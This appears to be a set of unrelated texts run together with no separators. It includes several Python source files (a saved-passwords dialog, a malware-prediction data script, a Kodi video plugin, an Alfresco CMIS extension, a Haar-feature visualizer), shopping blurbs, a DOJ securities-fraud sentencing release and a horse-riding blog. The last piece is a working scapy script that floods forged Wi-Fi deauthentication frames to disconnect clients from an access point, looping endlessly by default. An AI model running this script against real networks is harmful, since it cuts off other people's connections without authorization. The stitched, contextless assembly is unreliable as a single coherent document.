# -*- coding: utf-8 -*- # Copyright (c) 2009 - 2015 Detlev Offenbach <detlev@die-offenbachs.de> # """ Module implementing a dialog to show all saved logins. """ from __future__ import unicode_literals from PyQt5.QtCore import pyqtSlot, QSortFilterProxyModel from PyQt5.QtGui import QFont, QFontMetrics from PyQt5.QtWidgets import QDialog from E5Gui import E5MessageBox from .Ui_PasswordsDialog import Ui_PasswordsDialog class PasswordsDialog(QDialog, Ui_PasswordsDialog): """ Class implementing a dialog to show all saved logins. """ def __init__(self, parent=None): """ Constructor @param parent reference to the parent widget (QWidget) """ super(PasswordsDialog, self).__init__(parent) self.setupUi(self) self.__showPasswordsText = self.tr("Show Passwords") self.__hidePasswordsText = self.tr("Hide Passwords") self.passwordsButton.setText(self.__showPasswordsText) self.removeButton.clicked.connect( self.passwordsTable.removeSelected) self.removeAllButton.clicked.connect(self.passwordsTable.removeAll) import Helpviewer.HelpWindow from .PasswordModel import PasswordModel self.passwordsTable.verticalHeader().hide() self.__passwordModel = PasswordModel( Helpviewer.HelpWindow.HelpWindow.passwordManager(), self) self.__proxyModel = QSortFilterProxyModel(self) self.__proxyModel.setSourceModel(self.__passwordModel) self.searchEdit.textChanged.connect( self.__proxyModel.setFilterFixedString) self.passwordsTable.setModel(self.__proxyModel) fm = QFontMetrics(QFont()) height = fm.height() + fm.height() // 3 self.passwordsTable.verticalHeader().setDefaultSectionSize(height) self.passwordsTable.verticalHeader().setMinimumSectionSize(-1) self.__calculateHeaderSizes() def __calculateHeaderSizes(self): """ Private method to calculate the section sizes of the horizontal header. """ fm = QFontMetrics(QFont()) for section in range(self.__passwordModel.columnCount()): header = self.passwordsTable.horizontalHeader()\ .sectionSizeHint(section) if section == 0: header = fm.width("averagebiglongsitename") elif section == 1: header = fm.width("averagelongusername") elif section == 2: header = fm.width("averagelongpassword") buffer = fm.width("mm") header += buffer self.passwordsTable.horizontalHeader()\ .resizeSection(section, header) self.passwordsTable.horizontalHeader().setStretchLastSection(True) @pyqtSlot() def on_passwordsButton_clicked(self): """ Private slot to switch the password display mode. """ if self.__passwordModel.showPasswords(): self.__passwordModel.setShowPasswords(False) self.passwordsButton.setText(self.__showPasswordsText) else: res = E5MessageBox.yesNo( self, self.tr("Saved Passwords"), self.tr("""Do you really want to show passwords?""")) if res: self.__passwordModel.setShowPasswords(True) self.passwordsButton.setText(self.__hidePasswordsText) self.__calculateHeaderSizes()
aFe Control Sway Bars for the 2017-2018 Honda Civic Type-R I4-2.0L (t) provide the perfect balance front to rear to offer increased roll stiffness without upsetting the vehicles balance or traction control. Designed specifically for the Civic Type-R, the lightweight tubular sway bars will transform your Type-R’s handling and inspire driving confidence. Cornering will be flatter and neutral in any corner. Perfectly balanced, the 1.25" nonadjustable front and 1.00" 2-way adjustable tubular rear bars are constructed from lightweight tubular steel and include polyurethane bushings and greaseable, billet brackets for the rear. For years of durability and great looks, the bars are powder-coated a special 2 Stage tangerine orange. Perfectly balanced, aFe Control sway bars will have your Civic Type-R handling just as good at the track as it will around town.
# -*- coding: utf-8 -*- """ Created on Fri Mar 1 23:05:32 2019 @author: gtesei """ import pandas as pd import numpy as np import lightgbm as lgb #import xgboost as xgb from scipy.sparse import vstack, csr_matrix, save_npz, load_npz from sklearn.preprocessing import LabelEncoder, OneHotEncoder from sklearn.model_selection import StratifiedKFold #from sklearn.metrics import roc_auc_score import gc gc.enable() dtypes = { 'MachineIdentifier': 'category', 'ProductName': 'category', 'EngineVersion': 'category', 'AppVersion': 'category', 'AvSigVersion': 'category', 'IsBeta': 'int8', 'RtpStateBitfield': 'float16', 'IsSxsPassiveMode': 'int8', 'DefaultBrowsersIdentifier': 'float16', 'AVProductStatesIdentifier': 'float32', 'AVProductsInstalled': 'float16', 'AVProductsEnabled': 'float16', 'HasTpm': 'int8', 'CountryIdentifier': 'int16', 'CityIdentifier': 'float32', 'OrganizationIdentifier': 'float16', 'GeoNameIdentifier': 'float16', 'LocaleEnglishNameIdentifier': 'int8', 'Platform': 'category', 'Processor': 'category', 'OsVer': 'category', 'OsBuild': 'int16', 'OsSuite': 'int16', 'OsPlatformSubRelease': 'category', 'OsBuildLab': 'category', 'SkuEdition': 'category', 'IsProtected': 'float16', 'AutoSampleOptIn': 'int8', 'PuaMode': 'category', 'SMode': 'float16', 'IeVerIdentifier': 'float16', 'SmartScreen': 'category', 'Firewall': 'float16', 'UacLuaenable': 'float32', 'Census_MDC2FormFactor': 'category', 'Census_DeviceFamily': 'category', 'Census_OEMNameIdentifier': 'float16', 'Census_OEMModelIdentifier': 'float32', 'Census_ProcessorCoreCount': 'float16', 'Census_ProcessorManufacturerIdentifier': 'float16', 'Census_ProcessorModelIdentifier': 'float16', 'Census_ProcessorClass': 'category', 'Census_PrimaryDiskTotalCapacity': 'float32', 'Census_PrimaryDiskTypeName': 'category', 'Census_SystemVolumeTotalCapacity': 'float32', 'Census_HasOpticalDiskDrive': 'int8', 'Census_TotalPhysicalRAM': 'float32', 'Census_ChassisTypeName': 'category', 'Census_InternalPrimaryDiagonalDisplaySizeInInches': 'float16', 'Census_InternalPrimaryDisplayResolutionHorizontal': 'float16', 'Census_InternalPrimaryDisplayResolutionVertical': 'float16', 'Census_PowerPlatformRoleName': 'category', 'Census_InternalBatteryType': 'category', 'Census_InternalBatteryNumberOfCharges': 'float32', 'Census_OSVersion': 'category', 'Census_OSArchitecture': 'category', 'Census_OSBranch': 'category', 'Census_OSBuildNumber': 'int16', 'Census_OSBuildRevision': 'int32', 'Census_OSEdition': 'category', 'Census_OSSkuName': 'category', 'Census_OSInstallTypeName': 'category', 'Census_OSInstallLanguageIdentifier': 'float16', 'Census_OSUILocaleIdentifier': 'int16', 'Census_OSWUAutoUpdateOptionsName': 'category', 'Census_IsPortableOperatingSystem': 'int8', 'Census_GenuineStateName': 'category', 'Census_ActivationChannel': 'category', 'Census_IsFlightingInternal': 'float16', 'Census_IsFlightsDisabled': 'float16', 'Census_FlightRing': 'category', 'Census_ThresholdOptIn': 'float16', 'Census_FirmwareManufacturerIdentifier': 'float16', 'Census_FirmwareVersionIdentifier': 'float32', 'Census_IsSecureBootEnabled': 'int8', 'Census_IsWIMBootEnabled': 'float16', 'Census_IsVirtualDevice': 'float16', 'Census_IsTouchEnabled': 'int8', 'Census_IsPenCapable': 'int8', 'Census_IsAlwaysOnAlwaysConnectedCapable': 'float16', 'Wdft_IsGamer': 'float16', 'Wdft_RegionIdentifier': 'float16', 'HasDetections': 'int8' } print('Download Train and Test Data.\n') train = pd.read_csv('data/train.csv', dtype=dtypes, low_memory=True) train['MachineIdentifier'] = train.index.astype('uint32') test = pd.read_csv('data/test.csv', dtype=dtypes, low_memory=True) test['MachineIdentifier'] = test.index.astype('uint32') gc.collect() print('Transform all features to category.\n') print('Transform all features to category.\n') for usecol in train.columns.tolist()[1:-1]: train[usecol] = train[usecol].astype('str') test[usecol] = test[usecol].astype('str') #Fit LabelEncoder le = LabelEncoder().fit( np.unique(train[usecol].unique().tolist()+ test[usecol].unique().tolist())) #At the end 0 will be used for dropped values train[usecol] = le.transform(train[usecol])+1 test[usecol] = le.transform(test[usecol])+1 agg_tr = (train .groupby([usecol]) .aggregate({'MachineIdentifier':'count'}) .reset_index() .rename({'MachineIdentifier':'Train'}, axis=1)) agg_te = (test .groupby([usecol]) .aggregate({'MachineIdentifier':'count'}) .reset_index() .rename({'MachineIdentifier':'Test'}, axis=1)) agg = pd.merge(agg_tr, agg_te, on=usecol, how='outer').replace(np.nan, 0) #Select values with more than 1000 observations agg = agg[(agg['Train'] > 1000)].reset_index(drop=True) agg['Total'] = agg['Train'] + agg['Test'] #Drop unbalanced values agg = agg[(agg['Train'] / agg['Total'] > 0.2) & (agg['Train'] / agg['Total'] < 0.8)] agg[usecol+'Copy'] = agg[usecol] train[usecol] = (pd.merge(train[[usecol]], agg[[usecol, usecol+'Copy']], on=usecol, how='left')[usecol+'Copy'].replace(np.nan, 0).astype('int').astype('category')) test[usecol] = (pd.merge(test[[usecol]], agg[[usecol, usecol+'Copy']], on=usecol, how='left')[usecol+'Copy'] .replace(np.nan, 0).astype('int').astype('category')) del le, agg_tr, agg_te, agg, usecol gc.collect()
SHEfinds / Style / Fashion Math: Would You Let $80 Slip From Your Wallet for a Pair of Slippers? Fashion Math: Would You Let $80 Slip From Your Wallet for a Pair of Slippers? The beauty of these slippers is that you can wear them indoors year-round. Wear these slippers at home every night for a year, and they will cost you less than a piece of bubble gum from a machine. Check out our UGGs guide for more UGGs we love, plus cozy leggings to keep you warm all winter long, and see more Fashion Math equations.
# -*- coding: utf-8 -*- from resources.lib import utils import re title = ['RTBF Auvio'] img = ['rtbf'] readyForUse = True url_root = 'http://www.rtbf.be/auvio' categories = { '/categorie/series?id=35': 'Séries', '/categorie/sport?id=9': 'Sport', '/categorie/divertissement?id=29': 'Divertissement', '/categorie/culture?id=18': 'Culture', '/categorie/films?id=36': 'Films', '/categorie/sport/football?id=11': 'Football', '/categorie/vie-quotidienne?id=44': 'Vie quotidienne', '/categorie/musique?id=23': 'Musique', '/categorie/info?id=1': 'Info', '/categorie/humour?id=40': 'Humour', '/categorie/documentaires?id=31': 'Documentaires', '/categorie/enfants?id=32': 'Enfants' } def list_shows(channel, param): shows = [] if param == 'none': for url, title in categories.iteritems(): shows.append([channel,url,title,'','shows']) return shows def list_videos(channel, cat_url): videos = [] cat=cat_url[2:] filePath=utils.downloadCatalog(url_root + cat_url ,'rtbf' + cat + '.html',False,{}) html=open(filePath).read().replace('\xe9', 'e').replace('\xe0', 'a').replace('\n', ' ').replace('\r', '') match = re.compile(r'<h3 class="rtbf-media-item__title "><a href="(.*?)" title="(.*?)">',re.DOTALL).findall(html) for url,title in match: title=utils.formatName(title) infoLabels={ "Title": title} videos.append( [channel, url , title , '',infoLabels,'play'] ) return videos def getVideoURL(channel, url_video): html = utils.get_webcontent(url_video).replace('\xe9', 'e').replace('\xe0', 'a').replace('\n', ' ').replace('\r', '') url=re.findall(r'<meta property="og:video" content="(.*?).mp4"', html)[0] return url+'.mp4'
WASHINGTON—The former chief executive officer (CEO) of ArthroCare Corporation was sentenced to serve 20 years in prison, and the former chief financial officer (CFO) was sentenced to serve 10 years in prison today for their leading roles in a $750 million securities fraud scheme. Two other former senior vice presidents of ArthroCare were also sentenced to prison terms for their roles in the scheme. Principal Deputy Assistant Attorney General Marshall L. Miller of the Department of Justice’s Criminal Division and Special Agent in Charge Christopher H. Combs of the FBI’s San Antonio Field Office made the announcement. U.S. District Judge Sam Sparks in the Western District of Texas imposed the sentences. On June 2, 2014, former ArthroCare’s CEO Michael Baker, 55, and former CFO Michael Gluk, 56, were convicted by a jury of wire fraud, securities fraud, and conspiracy to commit wire and securities fraud; Baker was also convicted of making false statements. On June 24, 2013, John Raffle, 46, the former Vice President of Strategic Business Units, pleaded guilty to conspiracy to commit securities, mail and wire fraud, and two false statements charges. On May 9, 2013, David Applegate, 55, the former Senior Vice President of the Spine Division, pleaded guilty to conspiracy to commit securities, mail and wire fraud, and a false statements charge. At sentencing, the court found that investors lost approximately $756 million as a result of the defendants’ scheme to artificially inflate the share price of ArthroCare stock through sham transactions. According to court documents, between 2005 and 2009, Baker, Gluk, Raffle and Applegate executed a scheme to artificially inflate sales and revenue through a series of end-of-quarter transactions involving several of ArthroCare’s distributors. Products were shipped to distributors at quarter end based on ArthroCare’s need to meet Wall Street analyst forecasts, rather than distributors’ actual orders. ArthroCare then fraudulently reported these shipments as sales in its quarterly and annual filings at the time of the shipment, enabling the company to appear to meet or exceed internal and external earnings forecasts. ArthroCare’s distributors agreed to accept these shipments of millions of dollars of excess inventory in exchange for lucrative concessions from ArthroCare, such as upfront cash commissions, extended payment terms, and the ability to return products. In some cases, like that of ArthroCare’s largest distributor, DiscoCare, the defendants agreed ArthroCare would acquire the distributor and the inventory so that the distributor would not have to pay ArthroCare for the products at all. Between December 2005 and February 2009, ArthroCare’s shareholders held more than 25 million shares of ArthroCare stock. On July 21, 2008, after ArthroCare announced publicly that it would be restating its previously reported financial results to reflect the results of an internal investigation and account for the defendants’ fraud, the price of ArthroCare shares dropped from $40.03 to $23.21 per share. On Dec.19, 2008, ArthroCare again announced publicly that it had identified more accounting errors and possible irregularities related to the defendants’ fraud. That day, the price of ArthroCare shares dropped from approximately $16.23 to approximately $5.92 per share. In addition to the underlying conduct, Baker was convicted of lying to the U.S. Securities and Exchange Commission during its investigation of the conduct. The court further found, as part of sentencing, that Baker and Gluk each lied under oath during their trial testimony, in which they attempted to escape responsibility for their actions. In addition to their prison terms, Baker and Gluk were sentenced to serve five years of supervised release. In addition, the court ordered Gluk and Baker to forfeit $25,040,810, the amount of their profits from the scheme. John Raffle was sentenced to serve 80 months in prison followed by three years of supervised release. David Applegate was sentenced to serve 60 months in prison followed by three years of supervised release. The case was investigated by the FBI’s San Antonio Field Office. The case was prosecuted by Deputy Chief Benjamin D. Singer and Trial Attorneys Henry P. Van Dyck and William S.W. Chang of the Criminal Division’s Fraud Section. The Department recognizes the substantial assistance of the Criminal Division’s Asset Forfeiture and Money Laundering Section and the U.S. Securities and Exchange Commission, as well as the critical role of the U.S. Attorney’s Office for the Western District of Texas, which provided invaluable support to the prosecution team during all phases of the litigation.
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # from ..cmislib import model from ..cmislib.exceptions import InvalidArgumentException import datetime ALFRESCO_NS = 'http://www.alfresco.org' ALFRESCO_NSALIAS = 'alf' ALFRESCO_NSALIAS_DECL = 'xmlns:' + ALFRESCO_NSALIAS ALFRESCO_NSPREFIX = ALFRESCO_NSALIAS + ':' LOCALNAME_ASPECTS = 'aspects' LOCALNAME_PROPERTIES = 'properties' LOCALNAME_APPLIED_ASPECTS = 'appliedAspects' LOCALNAME_SET_ASPECTS = 'setAspects' LOCALNAME_ASPECTS_TO_ADD = 'aspectsToAdd' LOCALNAME_ASPECTS_TO_REMOVE = 'aspectsToRemove' TAGNAME_ALFRESCO_PROPERTIES = ALFRESCO_NSPREFIX + LOCALNAME_PROPERTIES TAGNAME_SET_ASPECTS = ALFRESCO_NSPREFIX + LOCALNAME_SET_ASPECTS TAGNAME_ASPECTS_TO_ADD = ALFRESCO_NSPREFIX + LOCALNAME_ASPECTS_TO_ADD TAGNAME_ASPECTS_TO_REMOVE = ALFRESCO_NSPREFIX + LOCALNAME_ASPECTS_TO_REMOVE OBJECT_TYPE_ID = 'cmis:objectTypeId' CHANGE_TOKEN = 'cmis:changeToken' def addSetAspectsToXMLDocument(xmldoc): entryElements = xmldoc.getElementsByTagNameNS(model.ATOM_NS, 'entry') entryElements[0].setAttribute(ALFRESCO_NSALIAS_DECL, ALFRESCO_NS) propertiesElements = xmldoc.getElementsByTagNameNS(model.CMIS_NS, LOCALNAME_PROPERTIES) if len(propertiesElements) == 0: objectElement = xmldoc.getElementsByTagNameNS(model.CMISRA_NS, 'object') propertiesElement = xmldoc.createElementNS(model.CMIS_NS, 'cmis:properties') objectElement[0].appendChild(propertiesElement) else: propertiesElement = propertiesElements[0] aspectsElement = xmldoc.createElementNS(ALFRESCO_NS, TAGNAME_SET_ASPECTS) propertiesElement.appendChild(aspectsElement) return aspectsElement def addPropertiesToXMLElement(xmldoc, element, properties): for propName, propValue in properties.items(): """ the name of the element here is significant: it includes the data type. I should be able to figure out the right type based on the actual type of the object passed in. I could do a lookup to the type definition, but that doesn't seem worth the performance hit """ propType = type(propValue) isList = False if (propType == list): propType = type(propValue[0]) isList = True if (propType == model.CmisId): propElementName = 'cmis:propertyId' if isList: propValueStrList = [] for val in propValue: propValueStrList.append(val) else: propValueStrList = [propValue] elif (propType == str): propElementName = 'cmis:propertyString' if isList: propValueStrList = [] for val in propValue: propValueStrList.append(val) else: propValueStrList = [propValue] elif (propType == datetime.datetime): propElementName = 'cmis:propertyDateTime' if isList: propValueStrList = [] for val in propValue: propValueStrList.append(val.isoformat()) else: propValueStrList = [propValue.isoformat()] elif (propType == bool): propElementName = 'cmis:propertyBoolean' if isList: propValueStrList = [] for val in propValue: propValueStrList.append(unicode(val).lower()) else: propValueStrList = [unicode(propValue).lower()] elif (propType == int): propElementName = 'cmis:propertyInteger' if isList: propValueStrList = [] for val in propValue: propValueStrList.append(unicode(val)) else: propValueStrList = [unicode(propValue)] elif (propType == float): propElementName = 'cmis:propertyDecimal' if isList: propValueStrList = [] for val in propValue: propValueStrList.append(unicode(val)) else: propValueStrList = [unicode(propValue)] else: propElementName = 'cmis:propertyString' if isList: propValueStrList = [] for val in propValue: propValueStrList.append(unicode(val)) else: propValueStrList = [unicode(propValue)] propElement = xmldoc.createElementNS(model.CMIS_NS, propElementName) propElement.setAttribute('propertyDefinitionId', propName) for val in propValueStrList: valElement = xmldoc.createElementNS(model.CMIS_NS, 'cmis:value') valText = xmldoc.createTextNode(val) valElement.appendChild(valText) propElement.appendChild(valElement) element.appendChild(propElement) def initData(self): model.CmisObject._initData(self) self._aspects = {} self._alfproperties = {} def findAlfrescoExtensions(self): if not hasattr(self, '_aspects'): self._aspects = {} if self._aspects == {}: if self.xmlDoc == None: self.reload() appliedAspects = self.xmlDoc.getElementsByTagNameNS(ALFRESCO_NS, LOCALNAME_APPLIED_ASPECTS) for node in appliedAspects: aspectType = self._repository.getTypeDefinition(node.childNodes[0].data) self._aspects[node.childNodes[0].data] = aspectType def hasAspect(self, arg): result = False if arg is not None: self._findAlfrescoExtensions() if isinstance(arg, model.ObjectType): result = arg.getTypeId() in self._aspects else: result = arg in self._aspects return result def getAspects(self): self._findAlfrescoExtensions() return self._aspects.values() def findAspect(self, propertyId): self._findAlfrescoExtensions() if (propertyId is not None) and (len(self._aspects) > 0): for id, aspect in self._aspects.iteritems(): props = aspect.getProperties() if propertyId in props: return aspect return None def updateAspects(self, addAspects=None, removeAspects=None): if addAspects or removeAspects: selfUrl = self._getSelfLink() xmlEntryDoc = getEntryXmlDoc(self._repository) # Patch xmlEntryDoc setAspectsElement = addSetAspectsToXMLDocument(xmlEntryDoc) if addAspects: addAspectElement = xmlEntryDoc.createElementNS(ALFRESCO_NS, TAGNAME_ASPECTS_TO_ADD) valText = xmlEntryDoc.createTextNode(addAspects) addAspectElement.appendChild(valText) setAspectsElement.appendChild(addAspectElement) if removeAspects: removeAspectElement = xmlEntryDoc.createElementNS(ALFRESCO_NS, TAGNAME_ASPECTS_TO_REMOVE) valText = xmlEntryDoc.createTextNode(removeAspects) removeAspectElement.appendChild(valText) setAspectsElement.appendChild(removeAspectElement) updatedXmlDoc = self._cmisClient.put(selfUrl.encode('utf-8'), xmlEntryDoc.toxml(encoding='utf-8'), model.ATOM_XML_TYPE) self.xmlDoc = updatedXmlDoc self._initData() def getProperties(self): result = model.CmisObject.getProperties(self) if not hasattr(self, '_alfproperties'): self._alfproperties = {} if self._alfproperties == {}: alfpropertiesElements = self.xmlDoc.getElementsByTagNameNS(ALFRESCO_NS, LOCALNAME_PROPERTIES) if len(alfpropertiesElements) > 0: for alfpropertiesElement in alfpropertiesElements: for node in [e for e in alfpropertiesElement.childNodes if e.nodeType == e.ELEMENT_NODE and e.namespaceURI == model.CMIS_NS]: #propertyId, propertyString, propertyDateTime #propertyType = cpattern.search(node.localName).groups()[0] propertyName = node.attributes['propertyDefinitionId'].value if node.childNodes and \ node.getElementsByTagNameNS(model.CMIS_NS, 'value')[0] and \ node.getElementsByTagNameNS(model.CMIS_NS, 'value')[0].childNodes: valNodeList = node.getElementsByTagNameNS(model.CMIS_NS, 'value') if (len(valNodeList) == 1): propertyValue = model.parsePropValue(valNodeList[0]. childNodes[0].data, node.localName) else: propertyValue = [] for valNode in valNodeList: propertyValue.append(model.parsePropValue(valNode. childNodes[0].data, node.localName)) else: propertyValue = None self._alfproperties[propertyName] = propertyValue result.update(self._alfproperties) return result def updateProperties(self, properties): selfUrl = self._getSelfLink() cmisproperties = {} alfproperties = {} # if we have a change token, we must pass it back, per the spec args = {} if (self.properties.has_key(CHANGE_TOKEN) and self.properties[CHANGE_TOKEN] != None): self.logger.debug('Change token present, adding it to args') args = {"changeToken": self.properties[CHANGE_TOKEN]} objectTypeId = properties.get(OBJECT_TYPE_ID) if (objectTypeId is None): objectTypeId = self.properties.get(OBJECT_TYPE_ID) objectType = self._repository.getTypeDefinition(objectTypeId) objectTypePropsDef = objectType.getProperties() for propertyName, propertyValue in properties.items(): if (propertyName == OBJECT_TYPE_ID) or (propertyName in objectTypePropsDef.keys()): cmisproperties[propertyName] = propertyValue else: if self.findAspect(propertyName) is None: raise InvalidArgumentException else: alfproperties[propertyName] = propertyValue xmlEntryDoc = getEntryXmlDoc(self._repository, properties=cmisproperties) # Patch xmlEntryDoc # add alfresco properties if len(alfproperties) > 0: aspectsElement = addSetAspectsToXMLDocument(xmlEntryDoc) alfpropertiesElement = xmlEntryDoc.createElementNS(ALFRESCO_NS, TAGNAME_ALFRESCO_PROPERTIES) aspectsElement.appendChild(alfpropertiesElement) # Like regular properties addPropertiesToXMLElement(xmlEntryDoc, alfpropertiesElement, alfproperties) updatedXmlDoc = self._cmisClient.put(selfUrl.encode('utf-8'), xmlEntryDoc.toxml(encoding='utf-8'), model.ATOM_XML_TYPE, **args) self.xmlDoc = updatedXmlDoc self._initData() return self def addAspect(self, arg): if arg is not None: aspect_id = arg if isinstance(arg, model.ObjectType): aspect_id = arg.getTypeId() if self._repository.getTypeDefinition(aspect_id) is None: raise InvalidArgumentException self._updateAspects(addAspects=aspect_id) def removeAspect(self, arg): if arg is not None: aspect_id = arg if isinstance(arg, model.ObjectType): aspect_id = arg.getTypeId() if self._repository.getTypeDefinition(aspect_id) is None: raise InvalidArgumentException self._updateAspects(removeAspects=aspect_id) def getEntryXmlDoc(repo=None, objectTypeId=None, properties=None, contentFile=None, contentType=None, contentEncoding=None): return model.getEntryXmlDoc(repo, objectTypeId, properties, contentFile, contentType, contentEncoding)
Stuart, Florida ? There?s never been a better time for people to upgrade their weary beds than with Bedding Stocks?s Flash Sale. Kicking off deals starting Monday, October 01 through Wednesday, October 10, 2018, the bedding retailer is dropping the prices of all their mattresses by $200. ?We want to help people get a good night sleep by purchasing from us without breaking an arm and leg. With this flash sale, everyone can now purchase a new mattress without breaking a wallet? said Steve Berke, co-founder of Bedding Stock.
#!/usr/bin/env python # -*- coding: utf-8 -*- # # visualize_classifier.py # # Copyright 2016 Ramkumar Natarajan <ram@ramkumar-ubuntu> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # # import os import cv2 import argparse import numpy as np import xml.etree.ElementTree as ET feats_per_stage = [] feats = [] tilted_per_feat = [] featID_in_stage = [] feat_img = [] scale_factor = 5 def improperXML(): raise Exception('The classifier XML is not properly formatted. Please verify whether you have given the correct classifier.') def main(): parser = argparse.ArgumentParser(description="Visualize the HAAR features obtained from Opencv Cascade Classifier") parser.add_argument("classifier", help="The full path to the classifier ") parser.add_argument("overlay", help="Image on which the features should be overlaid.") parser.add_argument("dst", help="The path to save the visualization.") args = parser.parse_args() if os.path.splitext(args.classifier)[1] != '.xml': raise Exception('A non XML classifier is provided. Cannot be parsed! Aborting...') # Create classifier XML object for parsing through the XML obj = ET.parse(args.classifier).getroot() if obj.tag != 'opencv_storage': improperXML() ''' for i in range(len(obj[0])): if obj[i].tag == 'cascade': for j in range(len(obj[i])): if obj[i][j].tag == 'stages': for k in range(len(obj[i][j])): if obj[i][j][k].tag == '_': for l in range(len(obj[i][j][k])): if obj[i][j][k][l].tag == 'maxWeakCount': feats_per_stage.append(int(obj[i][j][k][l].text)) ''' for i in obj.iter('width'): width = int(i.text) for i in obj.iter('height'): height = int(i.text) # Parse XML to collect weak classifiers per stage for i in obj.iter('stages'): for j in i.iter('maxWeakCount'): feats_per_stage.append(int(j.text)) for i in obj.iter('stageNum'): assert(len(feats_per_stage) == int(i.text)) # Parse XML to collect all the features in the classifier. for i in obj.iter('rects'): rect_in_feat=[] for j in i.iter('_'): rect_in_feat.append(j.text.split()) feats.append(rect_in_feat) # Parse XML to collect 'tilted' flag per feature for i in obj.iter('tilted'): tilted_per_feat.append(int(i.text)) assert(sum(feats_per_stage) == len(feats)) assert(sum(feats_per_stage) == len(tilted_per_feat)) # Converting all the feature rectangle values into numpy images. for i in feats: haar = np.ones((height, width), dtype = 'u1')*127 for j in i: if float(j[-1]) < 0: haar[int(j[1]):(int(j[1])+int(j[3])), int(j[0]):(int(j[0])+int(j[2]))] = 255 else: haar[int(j[1]):(int(j[1])+int(j[3])), int(j[0]):(int(j[0])+int(j[2]))] = 0 feat_img.append(haar) overlay = cv2.resize(cv2.imread(args.overlay, 0), (width*scale_factor, height*scale_factor), fx=0, fy=0, interpolation=cv2.INTER_LINEAR) kk = 0 for i in feat_img: res = cv2.resize(i, None, fx=scale_factor, fy=scale_factor, interpolation=cv2.INTER_LINEAR) blend = cv2.addWeighted(overlay, 0.3, res, 0.7, 0) cv2.imshow('img', blend) cv2.waitKey(0) return 0 if __name__ == '__main__': main()
Silvio Mazzoni instructed me as I cantered a circle in preparation for a technical course he’d set up at a clinic in Southern California. I hadn’t been all that prepared to take a private lesson with the (at the time) U.S. Eventing Team’s show jumping coach, but my own coach’s generosity made it possible and, well, here we were. My horse and I had been schooling around Training level jump courses, but we struggled a lot with impulsion and staying in front of the leg. Life lessons, I’ve found, are best learned when you’re least prepared for them – and I was in for a big one. Silvio was all about rhythm and balance, not interfering too much with your horse while attempting to create a rhythm. Achieving a good rhythm, in my mind, is a bit like swinging your legs to gather momentum on a playground swing. It’s a steady build-up that requires help from all parts of your body – but once you’ve gotten to that rushing pendulum motion, you just need to maintain with some adjustments of your leg. Minor adjustments, mind you – too much might take too much away from your hard-earned momentum. Accurate, right? But, much easier said than done. Case in point during this lesson, where my horse – as game as he was – struggled to maintain a good pace, which caused a domino effect of poor distances and off-kilter turns. Silvio instructed me to lower my hands and lengthen my reins a bit, in more of a flowing, following motion, while encouraging my horse with a strong leg aid and then backing off – teaching him to respond steadily, like swinging. Take a feel, but don’t take away. Minor adjustments. The repeated reminders in my head almost helped me create that rhythm I so wanted. This accomplished two things. First, it helped me create a nice, strong, forward rhythm out of which my distances seemed to flow. Second, it helped teach my horse to respond instantly to my leg instead of after a few strides of constant prodding. Think of it this way: you don’t get a swing going by sticking your legs straight out in front of you and pushing as hard as you can, do you? No. Rather, you swing, and then swoop, and swing, and then swoop. The same concept applies to your leg – apply and release, apply and release. Expect a reaction and thus, a steadier gain in momentum, with each application. My horse had a bit of a bewildered look in his eye, having been asked to go much more consistently forward than his previous days had required. But it paid off – our turns flowed, we landed more consistently on the correct lead, we didn’t lose (as much) momentum in the turns. Rhythm. The same concept can apply to any discipline – most issues, it seems, can fundamentally be at least helped by a bit more rhythm. It’s a thought I slid into my back pocket, for a later day when I was frustrated with my work, my riding, or any other sort of general life situation: put the pressure on, but don’t be afraid to back it off and release for a bit too – it’s all a part of creating something bigger.
#!/usr/bin/python import argparse import subprocess from sys import exit from scapy.all import * # Credit: https://gist.githubusercontent.com/jordan-wright/4576966/raw/5f17c9bfb747d6b2b702df3630028a097be8f399/perform_deauth.py def deauth(iface, ap, client, count, channel): subprocess.call(['iwconfig', iface, 'channel', str(channel)]) pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() cli_to_ap_pckt = None if client != 'FF:FF:FF:FF:FF:FF': cli_to_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth() print 'Sending Deauth to ' + client + ' from ' + ap if count == -1: print 'Press CTRL+C to quit' # We will do like aireplay does and send the packets in bursts of 64, then sleep for half a sec or so while count != 0: try: for i in range(64): # Send out deauth from the AP send(pckt, iface=iface, verbose=0) print 'Sent deauth to ' + client # If we're targeting a client, we will also spoof deauth from the client to the AP if client != 'FF:FF:FF:FF:FF:FF': send(cli_to_ap_pckt, iface=iface, verbose=0) # If count was -1, this will be an infinite loop count -= 1 except KeyboardInterrupt: break def main(): parser = argparse.ArgumentParser(description='deauth.py - Deauthticate clients from a network') parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='Interface to use for deauth') parser.add_argument('-a', '--ap', dest='ap', type=str, required=True, help='BSSID of the access point') parser.add_argument('-c', '--client', dest='client', type=str, required=True, help='BSSID of the client being DeAuthenticated') parser.add_argument('-n', '--packets', dest='count', type=int, required=False, default=-1,help='Number of DeAuthentication packets to send') parser.add_argument('-ch', '--channel', dest='channel', type=int, required=True, help='Channel which AP and client are on') args = parser.parse_args() deauth(args.iface, args.ap, args.client, args.count, args.channel) exit(0) if __name__ == '__main__': main()
